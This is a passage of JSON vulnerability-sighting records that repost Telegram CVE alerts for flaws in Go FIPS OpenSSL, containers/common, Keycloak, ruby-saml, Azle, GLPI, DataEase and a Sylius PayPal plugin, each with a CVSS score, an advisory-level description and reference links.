"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RF6J-XGQP-WJXG", "type": "seen", "source": "Telegram/eK7Ikx8B4zhc3RXJcMY-EZtQzuwPO0YG4YMu0LZCUnsVEJo", "content": "", "creation_timestamp": "2026-01-08T16:03:29.000000Z"}, {"uuid": "56c4a4fd-fb65-42c2-88b8-d05ca1d8d238", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8039", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "98d87347-ba20-4154-b425-b1f806fa00af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8678", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7582", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-14T16:37:39.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-14T16:43:57.000000Z"}, {"uuid": "d6ad1ad3-0f8c-4136-8e5f-2789fcf25f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8847", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7582", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-14T16:37:39.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-14T16:43:57.000000Z"}, {"uuid": "c66baeab-8d5a-403c-9ecb-67bd550a0210", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2416", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7582", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-14T16:37:39.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-14T16:43:57.000000Z"}, {"uuid": "16b54b1e-09e6-46c2-b93b-16dc2f606f8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9551", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7582", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-14T16:37:39.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-14T16:43:57.000000Z"}, {"uuid": "25a196cd-956a-46ce-9182-b7338685f50c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5F29-2333-H9C7", "type": "seen", "source": "Telegram/KVWOQnBiY3Eem9HhxjtYUT7TdVna0GpQEMRBO0Jx4tvF1fc", "content": "", "creation_timestamp": "2026-01-08T17:15:40.000000Z"}, {"uuid": "cdaf2a87-9e5a-433b-85ec-f44f31f777d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XC76-5PF9-MX8M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7692", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29776\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L)\n\ud83d\udd39 Description: Azle is a WebAssembly runtime for TypeScript and JavaScript on ICP. Calling `setTimer` in Azle versions `0.27.0`, `0.28.0`, and `0.29.0` causes an immediate infinite loop of timers to be executed on the canister, each timer attempting to clean up the global state of the previous timer. The infinite loop will occur with any valid invocation of `setTimer`. The problem has been fixed as of Azle version `0.30.0`. As a workaround, if a canister is caught in this infinite loop after calling `setTimer`, the canister can be upgraded and the timers will all be cleared, thus ending the loop.\n\ud83d\udccf Published: 2025-03-14T13:13:27.137Z\n\ud83d\udccf Modified: 2025-03-15T20:49:42.369Z\n\ud83d\udd17 References:\n1. https://github.com/demergent-labs/azle/security/advisories/GHSA-xc76-5pf9-mx8m\n2. https://github.com/demergent-labs/azle/releases/tag/0.30.0", "creation_timestamp": "2025-03-15T21:45:46.000000Z"}, {"uuid": "cf49aa71-2b92-4cdf-82ab-d7176054ff60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HW46-3HMR-X9XV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7388", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25292\n\ud83d\udd25 CVSS Score: 8.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. An authentication bypass vulnerability was found in ruby-saml prior to versions 1.12.4 and 1.18.0 due to a parser differential. ReXML and Nokogiri parse XML differently, the parsers can generate entirely different document structures from the same XML input. That allows an attacker to be able to execute a Signature Wrapping attack. This issue may lead to authentication bypass. Versions 1.12.4 and 1.18.0 contain a patch for the issue.\n\ud83d\udccf Published: 2025-03-12T20:53:24.353Z\n\ud83d\udccf Modified: 2025-03-12T21:35:08.259Z\n\ud83d\udd17 References:\n1. https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-754f-8gm6-c4r2\n2. https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv\n3. https://github.com/SAML-Toolkits/ruby-saml/commit/e76c5b36bac40aedbf1ba7ffaaf495be63328cd9\n4. https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97\n5. https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released\n6. https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials\n7. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4\n8. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0", "creation_timestamp": "2025-03-12T21:40:48.000000Z"}, {"uuid": "595a2a1e-a3fd-4a2e-a326-0ce72bb909aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8P38-R7VF-J6JX", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7550", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26626\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: The GLPI Inventory Plugin handles various types of tasks for GLPI agents for the GLPI asset and IT management software package. Versions prior to 1.5.0 are vulnerable to reflective cross-site scripting, which may lead to executing javascript code. Version 1.5.0 fixes the issue.\n\ud83d\udccf Published: 2025-03-14T12:47:14.011Z\n\ud83d\udccf Modified: 2025-03-14T13:36:05.088Z\n\ud83d\udd17 References:\n1. https://github.com/glpi-project/glpi-inventory-plugin/security/advisories/GHSA-8p38-r7vf-j6jx\n2. https://github.com/glpi-project/glpi-inventory-plugin/blob/1.5.0/CHANGELOG.md#150---2025-02-25", "creation_timestamp": "2025-03-14T13:47:14.000000Z"}, {"uuid": "094b749f-c700-4eab-ba4a-4850f458d9b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HXW4-VPFP-FRGV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14558", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46566\n\ud83d\udd25 CVSS Score: 6.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.9, authenticated users can complete RCE through the backend JDBC link. This issue has been patched in version 2.10.9.\n\ud83d\udccf Published: 2025-05-01T17:20:34.660Z\n\ud83d\udccf Modified: 2025-05-02T17:38:02.983Z\n\ud83d\udd17 References:\n1. https://github.com/dataease/dataease/security/advisories/GHSA-hxw4-vpfp-frgv", "creation_timestamp": "2025-05-02T18:19:55.000000Z"}, {"uuid": "19dddf0d-69c3-4a7f-970b-1ac86106c4ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ93-QW9P-JXQ4", "type": "published-proof-of-concept", "source": "Telegram/yKq4JZ_i7DqLkj1C3AmJNJ8CdN45JKlyrqrV14cu0DbuA70", "content": "", "creation_timestamp": "2026-01-08T15:04:15.000000Z"}, {"uuid": "b907b359-29d0-45d3-845a-0f202a6bdb2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7550", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7582", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-14T16:37:39.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-14T16:43:57.000000Z"}, {"uuid": "4a454adc-3c12-42f9-9c46-d228e090e2ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7925", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "a4039e2a-1e26-4fd2-bf6e-2d221b09eb1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7855", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7651", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6563\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (&gt; 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then open the \"consents\" tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system.\n\ud83d\udccf Published: 2023-12-14T18:01:26.005Z\n\ud83d\udccf Modified: 2025-03-15T03:33:57.850Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/security/cve/CVE-2023-6563\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253308\n8. https://github.com/keycloak/keycloak/issues/13340", "creation_timestamp": "2025-03-15T03:48:56.000000Z"}, {"uuid": "4f4569d8-539e-420d-b55a-42e621922533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7857", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7651", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6563\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (&gt; 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then open the \"consents\" tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system.\n\ud83d\udccf Published: 2023-12-14T18:01:26.005Z\n\ud83d\udccf Modified: 2025-03-15T03:33:57.850Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/security/cve/CVE-2023-6563\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253308\n8. https://github.com/keycloak/keycloak/issues/13340", "creation_timestamp": "2025-03-15T03:48:56.000000Z"}, {"uuid": "1887a731-6d61-4df8-b4ca-96daba28a8b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7854", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7651", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6563\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (&gt; 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then open the \"consents\" tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system.\n\ud83d\udccf Published: 2023-12-14T18:01:26.005Z\n\ud83d\udccf Modified: 2025-03-15T03:33:57.850Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/security/cve/CVE-2023-6563\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253308\n8. https://github.com/keycloak/keycloak/issues/13340", "creation_timestamp": "2025-03-15T03:48:56.000000Z"}, {"uuid": "8cbee7f0-da21-4b4e-95e2-96931c6b5879", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8112", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "6e580491-858e-4c5f-a2c9-3c1cda2289ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQQ3-Q84H-PJ6X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7770", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29788\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: The Syliud PayPal Plugin is the Sylius Core Team\u2019s plugin for the PayPal Commerce Platform. A vulnerability in versions prior to 1.6.1, 1.7.1, and 2.0.1 allows users to manipulate the final payment amount processed by PayPal. If a user modifies the item quantity in their shopping cart after initiating the PayPal Express Checkout process, PayPal will not receive the updated total amount. As a result, PayPal captures only the initially transmitted amount, while Sylius incorrectly considers the order fully paid based on the modified total. This flaw can be exploited both accidentally and intentionally, potentially enabling fraud by allowing customers to pay less than the actual order value. Attackers can intentionally pay less than the actual total order amount, business owners may suffer financial losses due to underpaid orders, and integrity of payment processing is compromised. The issue is fixed in versions 1.6.1, 1.7.1, 2.0.1, and above. To resolve the problem in the end application without updating to the newest patches, there is a need to overwrite `ProcessPayPalOrderAction`, `CompletePayPalOrderFromPaymentPageAction`, and `CaptureAction` with modified logic.\n\ud83d\udccf Published: 2025-03-17T13:25:24.343Z\n\ud83d\udccf Modified: 2025-03-17T13:25:24.343Z\n\ud83d\udd17 References:\n1. https://github.com/Sylius/PayPalPlugin/security/advisories/GHSA-pqq3-q84h-pj6x\n2. https://github.com/Sylius/PayPalPlugin/commit/31e71b0457e5d887a6c19f8cfabb8b16125ec406\n3. https://github.com/Sylius/PayPalPlugin/commit/8a81258f965b7860d4bccb52942e4c5b53e6774d\n4. https://github.com/Sylius/PayPalPlugin/releases/tag/v1.6.1\n5. 